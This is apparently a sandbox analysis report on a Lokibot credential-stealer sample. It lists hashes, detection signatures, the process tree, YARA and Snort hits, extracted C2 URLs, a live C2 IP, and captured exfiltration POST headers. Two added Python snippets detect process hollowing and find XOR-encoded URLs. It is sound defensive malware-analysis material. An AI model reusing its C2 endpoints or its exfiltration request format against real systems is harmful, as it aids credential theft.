Windows Analysis Report U001P56ybm.exe

Overview

General Information

Sample Name: U001P56ybm.exe
Analysis ID: 528740
MD5: 969e2ccfcacf3573de922d9bce81e3fd
SHA1: c3dd33a00d4dad9330d0c2dbc0c3b75396c70f8b
SHA256: 4a059628d9f56799d68937821b355477502fe0704d41a75c372b1c036061d59f
Tags: exe, Loki

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Injects a PE file into a foreign process
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Process Tree

  • System is w10x64
  • U001P56ybm.exe (PID: 4640 cmdline: "C:\Users\user\Desktop\U001P56ybm.exe" MD5: 969E2CCFCACF3573DE922D9BCE81E3FD)
    • U001P56ybm.exe (PID: 5684 cmdline: "C:\Users\user\Desktop\U001P56ybm.exe" MD5: 969E2CCFCACF3573DE922D9BCE81E3FD)
  • cleanup
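The tree shows the sample starting a second copy of itself (PID 4640 spawning PID 5684 with the identical command line). Read together with the signatures "Creates a process in suspended mode (likely to inject code)" and "Injects a PE file into a foreign process", that is the usual shape of process hollowing: the child is created suspended and its image is replaced with the unpacked payload (the 400000 region that the Yara rules below match in process 2). No Sigma rule matched in this run, so the following Python is an added example, not code from the report, of a heuristic a detection engineer could run over process-creation telemetry: flag a child whose image path is identical to its parent's and lives under a user-writable directory. The event record layout, the PIDs other than 4640 and 5684, the explorer.exe parent, the browser control case and the directory list are all assumptions made for the demo.

```python
from dataclasses import dataclass

# Directories an unprivileged user can write to. A self-spawn from one of these is far
# more suspicious than, say, chrome.exe spawning chrome.exe from Program Files.
# This list is an assumption for the demo, not something the report states.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\", "\\desktop\\")


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon event 1 / EDR style); field names are assumed."""
    pid: int
    ppid: int
    image: str
    cmdline: str


def is_user_writable(path: str) -> bool:
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)


def find_self_spawns(events):
    """Return (parent_pid, child_pid, image) for every child whose image path equals its
    parent's image path and lies under a user-writable directory."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for child in events:
        parent = by_pid.get(child.ppid)
        if parent is None:
            continue  # parent not in the log (system process or started before logging)
        if child.image.lower() == parent.image.lower() and is_user_writable(child.image):
            hits.append((parent.pid, child.pid, child.image))
    return hits


# Constructed event log: the two PIDs and command line from the report's process tree,
# plus an assumed explorer.exe parent and a benign browser self-spawn as a control case.
SAMPLE_EVENTS = [
    ProcEvent(1234, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2222, 1234, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe"),
    ProcEvent(2223, 2222, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe --type=renderer"),
    ProcEvent(4640, 1234, r"C:\Users\user\Desktop\U001P56ybm.exe", r'"C:\Users\user\Desktop\U001P56ybm.exe"'),
    ProcEvent(5684, 4640, r"C:\Users\user\Desktop\U001P56ybm.exe", r'"C:\Users\user\Desktop\U001P56ybm.exe"'),
]

if __name__ == "__main__":
    for ppid, pid, image in find_self_spawns(SAMPLE_EVENTS):
        print(f"self-spawn from user-writable path: {ppid} -> {pid} {image}")
```

The path filter is what keeps this usable: browsers, updaters and installers self-spawn constantly, but almost always from Program Files or the Windows directory. Pair the hit with a suspended-creation flag (CREATE_SUSPENDED) or a later WriteProcessMemory/SetThreadContext on the child when the telemetry source exposes them.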

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Note that the connections actually made during this run went to http://194.85.248.167/imt/fre.php (flagged by Avira URL Cloud and by every Snort alert in the Networking section), which is not in the extracted list. The kbfvzoboss.bid and alphastand.* entries turn up in a great many Lokibot builds as fixed placeholder slots, so treat the observed IP and URL as the actionable indicators and the four listed URLs as secondary ones.

Yara Overview

Memory Dumps

Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp
  Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
  Rule: JoeSecurity_aPLib_compressed_binary | Description: Yara detected aPLib compressed binary | Author: Joe Security
  Rule: JoeSecurity_Lokibot | Description: Yara detected Lokibot | Author: Joe Security
  Rule: Loki_1 | Description: Loki Payload | Author: kevoreilly
    • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
    • 0x153fc:$a2: last_compatible_version
  Rule: Lokibot | Description: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
    • 0x13bff:$des3: 68 03 66 00 00
    • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
    • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
  (36 matches in the full report; the remaining entries are not included in this extract)

Unpacked PEs

Source: 2.0.U001P56ybm.exe.400000.6.unpack
  Rule: SUSP_XORed_URL_in_EXE | Description: Detects an XORed URL in an executable | Author: Florian Roth
    • 0x13e78:$s1: http://
    • 0x17633:$s1: http://
    • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
    • 0x13e80:$s2: https://
    • 0x13e78:$f1: http://
    • 0x17633:$f1: http://
    • 0x13e80:$f2: https://
  Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
  Rule: JoeSecurity_aPLib_compressed_binary | Description: Yara detected aPLib compressed binary | Author: Joe Security
  Rule: JoeSecurity_Lokibot | Description: Yara detected Lokibot | Author: Joe Security
  Rule: Loki_1 | Description: Loki Payload | Author: kevoreilly
    • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
    • 0x13ffc:$a2: last_compatible_version
  (82 matches in the full report; the remaining entries are not included in this extract)
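The SUSP_XORed_URL_in_EXE hit deserves a closer look. The bytes \x97\x8B\x8B\x8F\xC5\xD0\xD0 at 0x18074 are the ASCII string http:// XORed with the single byte 0xFF (0x68 ^ 0xFF = 0x97, 0x74 ^ 0xFF = 0x8B, and so on), while the hits at 0x13e78, 0x17633 and 0x13e80 are the plain markers, which the same rule also reports because key 0x00 is part of its key range. The Python below is an added example, not code from the report or from the rule's author: it reproduces the idea behind the rule by searching a buffer for http:// and https:// under every single-byte XOR key and then decoding the URL that follows each match under the key that produced it, which is what an analyst does next after such a hit. The input buffer is constructed from two of the C2 URLs listed in the configuration above; the 0xFF key and the offsets in it are assumptions for the demo.

```python
MARKERS = (b"http://", b"https://")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with one single-byte key (key 0 leaves data unchanged)."""
    return bytes(b ^ key for b in data)


def _decode_run(buf: bytes, off: int, key: int, max_len: int) -> str:
    """Decode forward from off under key until a byte outside printable ASCII (0x21..0x7E)
    appears; that byte is the terminator as the binary stored it, e.g. a NUL XORed with key."""
    end = off
    while end < len(buf) and end - off < max_len:
        if not 0x21 <= (buf[end] ^ key) <= 0x7E:
            break
        end += 1
    return xor_bytes(buf[off:end], key).decode("ascii")


def find_xored_urls(buf: bytes, max_len: int = 256):
    """Return sorted (offset, key, url) triples for every http:// or https:// marker that
    appears in buf under some single-byte XOR key. key 0 means the URL is in plaintext."""
    hits = []
    for key in range(256):
        for marker in MARKERS:
            needle = xor_bytes(marker, key)  # what the marker looks like on disk under this key
            off = buf.find(needle)
            while off >= 0:
                hits.append((off, key, _decode_run(buf, off, key, max_len)))
                off = buf.find(needle, off + 1)
    return sorted(hits)


# Constructed buffer standing in for a slice of the unpacked PE: one plaintext URL and one
# URL XORed with 0xFF, the key that turns "http://" into the 97 8B 8B 8F C5 D0 D0 bytes
# the report shows at 0x18074. Both URLs come from the report's extracted C2 list; the
# filler bytes and the layout are invented for the demo.
SAMPLE = (
    b"\x00" * 16
    + b"http://alphastand.top/alien/fre.php\x00"
    + b"\x90" * 8
    + xor_bytes(b"http://kbfvzoboss.bid/alien/fre.php\x00", 0xFF)
    + b"\x00" * 8
)

if __name__ == "__main__":
    for off, key, url in find_xored_urls(SAMPLE):
        print(f"0x{off:x} key=0x{key:02x} {url}")
```

Run against a real unpacked dump, expect false positives from keys that happen to line up with unrelated bytes; the decoded run for a genuine hit reads as a URL, the others as garbage, which is also why the YARA rule combines the XORed string match with further conditions rather than alerting on the bytes alone.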

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
Multi AV Scanner detection for submitted file
Source: U001P56ybm.exe, ReversingLabs: Detection: 25%
Antivirus detection for URL or domain
Source: http://194.85.248.167/imt/fre.php, Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll, ReversingLabs: Detection: 22%
Antivirus or Machine Learning detection for unpacked file
Source: 2.0.U001P56ybm.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen2
Uses 32bit PE files
Source: U001P56ybm.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP source: U001P56ybm.exe, 00000000.00000003.282481147.0000000002990000.00000004.00000001.sdmp, U001P56ybm.exe, 00000000.00000003.289797489.0000000002B20000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: U001P56ybm.exe, 00000000.00000003.282481147.0000000002990000.00000004.00000001.sdmp, U001P56ybm.exe, 00000000.00000003.289797489.0000000002B20000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\U001P56ybm.exe, Code function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405250
Source: C:\Users\user\Desktop\U001P56ybm.exe, Code function: 0_2_00405C22 FindFirstFileA,FindClose, 0_2_00405C22
Source: C:\Users\user\Desktop\U001P56ybm.exe, Code function: 0_2_00402630 FindFirstFileA, 0_2_00402630
Source: C:\Users\user\Desktop\U001P56ybm.exe, Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 2_2_00403D74
Source: C:\Users\user\Desktop\U001P56ybm.exe, Code function: 2_1_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 2_1_00403D74

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS. Every alert is between the analysis host 192.168.2.3 and 194.85.248.167:80, the server the sample actually talked to. Two kinds of client connection were seen:

Connections 192.168.2.3:49744 -> 194.85.248.167:80 and 192.168.2.3:49745 -> 194.85.248.167:80 (credential upload), each raising:
  2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
  2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno)
  2025381 ET TROJAN LokiBot Checkin
  2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2

Connections from 192.168.2.3 client ports 49746, 49747, 49748, 49749, 49750, 49751, 49752, 49755, 49756, 49757, 49758, 49759, 49760, 49761, 49762, 49763, 49765, 49766, 49769, 49770, 49785, 49809, 49813, 49814, 49817, 49818, 49819, 49820, 49821, 49822, 49823, 49825, 49827, 49829, 49833, 49845, 49851, 49855 and 49856 -> 194.85.248.167:80 (39 command polls), each raising:
  2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1
  2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno)
  2025381 ET TROJAN LokiBot Checkin
  2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2
  2025483 ET TROJAN LokiBot Fake 404 Response, in the reverse direction 194.85.248.167:80 -> 192.168.2.3:<client port>
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49857 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49857 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49857 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49857 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49857
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49858 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49858 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49858 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49858 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49858
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49859 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49859 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49859 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49859 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49859
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49860 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49860 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49860 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49860 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49860
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49861 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49861 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49861 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49861 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49861
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49862 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49862 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49862 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49862 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49862
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49863 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49863 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49863 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49863 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49863
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49865 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49865 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49865 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49865 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49865
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49866 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49866 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49866 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49866 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49866
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49867 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49867 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49867 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49867 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49867
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractor | URLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractor | URLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractor | URLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractor | URLs: http://alphastand.top/alien/fre.php
              Source: Joe Sandbox View | ASN Name: DATACENTERRO DATACENTERRO
              Source: global traffic | HTTP traffic detected: POST /imt/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 194.85.248.167 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: 3D93679C | Content-Length: 190 | Connection: close
              Source: global traffic | HTTP traffic detected: POST /imt/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 194.85.248.167 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: 3D93679C | Content-Length: 163 | Connection: close
              Source: unknown | TCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: U001P56ybm.exe, 00000002.00000002.544901710.00000000004A0000.00000040.00000001.sdmp | String found in binary or memory: http://194.85.248.167/imt/fre.php
              Source: U001P56ybm.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: U001P56ybm.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: U001P56ybm.exe, U001P56ybm.exe, 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, U001P56ybm.exe, 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
              Source: unknown | HTTP traffic detected: POST /imt/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 194.85.248.167 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: 3D93679C | Content-Length: 190 | Connection: close
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_2_00404ED4 recv, 2_2_00404ED4
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00404E07

              System Summary:

              Malicious sample detected (through community Yara rule)
              Source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
              Source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
              Source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
              Source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
              Source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
              Source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: U001P56ybm.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
